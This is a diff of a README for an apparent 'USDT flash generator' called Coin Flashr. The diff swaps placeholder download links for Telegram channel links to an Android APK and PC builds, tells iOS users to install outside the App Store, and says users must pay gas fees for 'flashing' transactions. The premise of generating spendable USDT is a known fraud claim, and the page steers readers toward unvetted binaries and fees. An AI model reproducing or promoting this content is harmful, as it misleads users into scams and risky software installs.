flashusdt-maker/usdt-generator/README.md

 ## Installation

 ### Android
-- Download the latest APK from the [release page](#).
+- Download the latest APK from the [https://t.me/usdtflashapp/3](#).

 ### iOS
 - Visit the official project website to download the iOS version. **This is not an App Store download.**

 ### PC (Windows, Mac, Linux)
 - Coin Flashr is available for PC users, with a dedicated repository for each OS version.
-You can find it [here](#).
+You can find it [https://t.me/usdtflashapp/4](#).

 ## Usage
 - **Gas fees** are required for every non-Bitcoin (USDT, wBTC) flashing transaction.